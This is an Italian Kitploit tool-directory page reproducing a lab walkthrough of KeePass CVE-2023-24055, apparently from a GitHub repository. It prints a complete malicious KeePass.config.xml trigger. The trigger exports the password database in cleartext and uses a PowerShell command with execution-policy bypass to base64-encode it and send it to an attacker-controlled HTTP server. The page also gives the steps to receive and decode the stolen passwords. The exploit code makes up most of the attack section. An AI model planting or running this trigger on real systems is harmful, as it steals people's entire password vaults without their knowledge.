Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
KeePass-CVE-2023-24055 — KeePass CVE-2023-24055 riproduzione | Kitploit
Strumenti/GitHubGitHub/zwlsix/keepass-cve-2023-24055
Attacchi alle PasswordAnalisi delle VulnerabilitàExploitEsfiltrazione DatiApprendimento e FormazioneLab e Pratica
GitHubzwlsix/keepass-cve-2023-24055

KeePass-CVE-2023-24055

KeePass CVE-2023-24055 riproduzione

Vedi Repository
123 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

KeePass-CVE-2023-24055

Riproduzione di KeePass CVE-2023-24055 Riproduzione di KeePass CVE-2023-24055

1, Preparazione delle macchine: kali (192.168.232.129), windows10 (192.168.232.128)

2, Versione KeePass: 2.53

图片1

2, Principio: modificando il file di configurazione KeePass.config.xml, aggiungere la configurazione del trigger: esportare la password in chiaro e caricarla sul server dell'attaccante; il codice XML per aggiungere il trigger è il seguente:

Dove: il campo <Parameter>c:\Users\Long\AppData\Local\Temp\exploit.xml</Parameter> imposta il percorso locale per esportare la password in chiaro

Utilizza PowerShell con il metodo GET per trasferire il file password

root@kitploit:~
<Parameter>PowerShell.exe</Parameter>
<Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Long\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.232.129:8888/$var -Method GET </Parameter>
root@kitploit:~
<Triggers>
				<Trigger>
					<Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
					<Name>exploit</Name>
					<Events>
						<Event>
							<TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
							<Parameters>
								<Parameter>0</Parameter>
								<Parameter />
							</Parameters>
						</Event>
					</Events>
					<Conditions />
					<Actions>
						<Action>
							<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
							<Parameters>
								<Parameter>c:\Users\Long\AppData\Local\Temp\exploit.xml</Parameter>
								<Parameter>KeePass XML (2.x)</Parameter>
								<Parameter />
								<Parameter />
							</Parameters>
						</Action>
						<Action>
							<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
							<Parameters>
								<Parameter>PowerShell.exe</Parameter>
								<Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Long\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.232.129:8888/$var -Method GET </Parameter>
								<Parameter>False</Parameter>
								<Parameter>1</Parameter>
								<Parameter />
							</Parameters>
						</Action>
					</Actions>
				</Trigger>
			</Triggers>

3, Modificare il file KeePass.config.xml, aggiungere la configurazione XML e salvare (posizione: all'interno del tag <TriggerSystem></TriggerSystem>), aprire KeePass per verificare se l'aggiunta è riuscita:

tu2

4, Aprire Kali e usare il comando python3 -m http.server 8888 per avviare un server web per ricevere la password esportata in chiaro

tu3

5, Aprire KeePass, creare una nuova voce e salvarla; il trigger viene attivato, controllare il contenuto ricevuto da Kali:

tu4

6, Copiare il contenuto in un file e decodificarlo con base64 per ottenere la password in chiaro

tu5

tu6

Articoli di riferimento: https://github.com/alt3kx/CVE-2023-24055_PoC

https://www.youtube.com/watch?v=tqK1bns51ek

Scarica lo strumento